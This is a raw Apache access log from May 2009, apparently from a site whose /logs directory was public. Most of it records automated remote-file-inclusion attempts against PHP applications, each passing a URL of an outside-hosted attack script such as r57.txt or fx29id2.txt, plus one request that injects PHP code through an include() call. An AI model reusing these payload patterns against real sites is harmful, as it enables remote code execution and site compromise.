219.94.148.39 - - [17/May/2009:15:30:20 -0500] "GET /logs/access_log.1227744000//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:20 -0500] "GET /logs/access_log.1233014400//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:31 -0500] "GET /logs/access_log.1233273600//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:31 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:45 -0500] "GET /logs/access_log.1233792000//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:49 -0500] "GET /logs/access_log.1235433600//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:49 -0500] "GET /logs/access_log.1229904000//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:50 -0500] "GET /logs/access_log.1232755200//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:50 -0500] "GET /logs/access_log.1231200000//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:04 -0500] "GET /logs/access_log.1233100800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:04 -0500] "GET /logs/access_log.1231804800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:10 -0500] "GET /logs/access_log.1231718400//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:10 -0500] "GET /logs/access_log.1228694400//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:10 -0500] "GET /logs/access_log.1226620800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:15 -0500] "GET /logs/access_log.1239580800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:15 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:15 -0500] "GET /logs/access_log.1235174400//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:31:15 -0500] "GET /logs/access_log.1233532800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:15:33:14 -0500] "GET //guestbook1//admin.php?include_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:15:33:14 -0500] "GET /logs//guestbook1//admin.php?include_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:15:33:14 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:15:33:47 -0500] "GET /logs/access_log.1239062400//guestbook1//admin.php?include_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.196.124.4 - - [17/May/2009:15:37:07 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
91.196.124.4 - - [17/May/2009:15:37:07 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
216.129.119.16 - - [17/May/2009:15:41:03 -0500] "GET /logs/access_log.1239148800 HTTP/1.0" 200 302382 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
84.45.45.133 - - [17/May/2009:15:41:42 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
84.45.45.133 - - [17/May/2009:15:41:42 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
84.45.45.133 - - [17/May/2009:15:41:42 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.45.45.133 - - [17/May/2009:15:41:46 -0500] "GET /logs/access_log.1239926400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:15:50:04 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 317 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:15:50:04 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 344 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:15:50:04 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:15:50:09 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 344 "-""Mozilla/5.0"
91.196.124.4 - - [17/May/2009:15:56:36 -0500] "GET /logs//admin/common.inc.php?base_path=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
91.196.124.4 - - [17/May/2009:15:56:36 -0500] "GET //admin/common.inc.php?base_path=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
91.196.124.4 - - [17/May/2009:16:01:06 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
91.196.124.4 - - [17/May/2009:16:01:06 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
212.59.11.66 - - [17/May/2009:16:02:48 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
212.59.11.66 - - [17/May/2009:16:02:48 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.59.11.66 - - [17/May/2009:16:02:48 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
212.59.11.66 - - [17/May/2009:16:03:17 -0500] "GET /logs/access_log.1239926400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://tottradio.co.uk/language/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.17.129.100 - - [17/May/2009:16:05:42 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:16:06:21 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:16:06:21 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:16:06:21 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:16:06:22 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.106.124 - - [17/May/2009:16:06:45 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.124 - - [17/May/2009:16:07:30 -0500] "GET /logs/access_log.1154649600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.162 - - [17/May/2009:16:10:00 -0500] "GET /logs/access_log.1118534400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.12.149.149 - - [17/May/2009:16:13:59 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
201.12.149.149 - - [17/May/2009:16:13:59 -0500] "GET /logs/access_log.1236643200/lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
201.12.149.149 - - [17/May/2009:16:14:00 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.184.52.8 - - [17/May/2009:16:14:20 -0500] "GET /logs/home.php?index=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
201.12.149.149 - - [17/May/2009:16:14:24 -0500] "GET /logs/access_log.1236902400/lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
91.184.52.8 - - [17/May/2009:16:16:11 -0500] "GET /home.php?index=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
91.184.52.8 - - [17/May/2009:16:18:44 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
91.184.52.8 - - [17/May/2009:16:18:44 -0500] "GET //include/lib.inc.php?site_path=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
190.144.44.36 - - [17/May/2009:16:30:43 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:16:30:43 -0500] "GET /logs/access_log.1235865600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:16:30:43 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:16:30:43 -0500] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.106.123 - - [17/May/2009:16:32:29 -0500] "GET /logs/access_log.1176508800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [17/May/2009:16:34:35 -0500] "GET /icons/back.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
74.53.42.66 - - [17/May/2009:16:37:55 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.814"
74.53.42.66 - - [17/May/2009:16:37:55 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.814"
66.249.67.180 - - [17/May/2009:16:43:37 -0500] "GET /nun.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
82.194.87.219 - - [17/May/2009:16:47:05 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laubrotel.com/cgi/id? HTTP/1.1" 404 305 "-""libwww-perl/5.822"
65.55.208.143 - - [17/May/2009:16:48:06 -0500] "GET /logs/access_log.1112140800 HTTP/1.1" 200 258 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [17/May/2009:16:48:06 -0500] "GET /logs/access_log.1124928000 HTTP/1.1" 200 364 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
193.111.226.242 - - [17/May/2009:16:49:51 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laubrotel.com/cgi/id? HTTP/1.1" 404 300 "-""libwww-perl/5.69"
65.55.106.194 - - [17/May/2009:16:58:29 -0500] "GET /logs/access_log.1224979200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.196.124.4 - - [17/May/2009:16:59:45 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
91.196.124.4 - - [17/May/2009:16:59:45 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
195.239.112.19 - - [17/May/2009:16:59:58 -0500] "GET /logs/errors.php?error=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
195.239.112.19 - - [17/May/2009:17:00:04 -0500] "GET /errors.php?error=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
163.28.32.100 - - [17/May/2009:17:04:47 -0500] "GET /logs//add.php?APB_rp=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
163.28.32.100 - - [17/May/2009:17:04:47 -0500] "GET //add.php?APB_rp=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
163.28.32.100 - - [17/May/2009:17:04:48 -0500] "GET /logs//add.php?APB_rp=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
163.28.32.100 - - [17/May/2009:17:04:48 -0500] "GET //add.php?APB_rp=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
77.221.130.26 - - [17/May/2009:17:07:53 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:07:54 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:07:54 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ppdpetaling.net/files/borang/osyricid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.83.252.46 - - [17/May/2009:17:08:49 -0500] "GET /logs//add.php?APB_rp=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
195.83.252.46 - - [17/May/2009:17:08:49 -0500] "GET //add.php?APB_rp=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
77.221.130.26 - - [17/May/2009:17:10:06 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.239.112.19 - - [17/May/2009:17:10:42 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
195.239.112.19 - - [17/May/2009:17:10:43 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
77.221.130.26 - - [17/May/2009:17:10:44 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:10:44 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:10:44 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:11:30 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:11:30 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:11:31 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:17:11:31 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.94.30.156 - - [17/May/2009:17:14:02 -0500] "GET /logs//inc/content.inc.php?sIncPath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.94.30.156 - - [17/May/2009:17:14:02 -0500] "GET //inc/content.inc.php?sIncPath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.94.30.156 - - [17/May/2009:17:14:02 -0500] "GET /logs/access_log.1239580800//inc/content.inc.php?sIncPath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
84.17.129.100 - - [17/May/2009:17:27:40 -0500] "GET /logs/access_log.1233964800//?sIncPath=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.17.129.100 - - [17/May/2009:17:27:40 -0500] "GET //?sIncPath=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
84.17.129.100 - - [17/May/2009:17:27:41 -0500] "GET /logs//?sIncPath=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
84.17.129.100 - - [17/May/2009:17:28:10 -0500] "GET /logs/access_log.1237766400//?sIncPath=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:17:30:48 -0500] "GET /logs//start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:17:30:48 -0500] "GET /logs/access_log.1238112000//start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:17:30:48 -0500] "GET //start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:17:30:48 -0500] "GET /logs/access_log.1239494400//start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
189.156.21.56 - - [17/May/2009:17:31:11 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tugaspeed.info/idpriv8.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
189.156.21.56 - - [17/May/2009:17:31:11 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tugaspeed.info/idpriv8.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
221.139.104.104 - - [17/May/2009:17:33:14 -0500] "GET /logs/access_log.1240358400//start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
74.53.42.66 - - [17/May/2009:17:33:27 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.814"
74.53.42.66 - - [17/May/2009:17:33:27 -0500] "GET //config/dbutil.bck.php?confdir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.814"
121.173.130.41 - - [17/May/2009:17:34:32 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:17:34:33 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:17:34:33 -0500] "GET /logs/access_log.1230249600/inc/cmses/aedatingCMS.php?dir[inc]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.17.129.100 - - [17/May/2009:17:35:18 -0500] "GET /logs/access_log.1239753600//?sIncPath=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.106.211 - - [17/May/2009:17:45:59 -0500] "GET /logs/access_log.1211241600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.164 - - [17/May/2009:17:49:36 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
221.139.104.104 - - [17/May/2009:17:55:34 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:17:55:34 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:17:55:34 -0500] "GET //config/dbutil.bck.php?confdir=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
65.55.106.212 - - [17/May/2009:17:59:58 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.212 - - [17/May/2009:18:00:51 -0500] "GET /logs/access_log.1211241600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.53.42.66 - - [17/May/2009:18:03:36 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
74.53.42.66 - - [17/May/2009:18:03:36 -0500] "GET //index.php?DOCUMENT_ROOT=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
65.55.106.140 - - [17/May/2009:18:04:26 -0500] "GET /logs/access_log.1191974400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.234.111.100 - - [17/May/2009:18:13:43 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.234.111.100 - - [17/May/2009:18:13:44 -0500] "GET /?DOCUMENT_ROOT=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
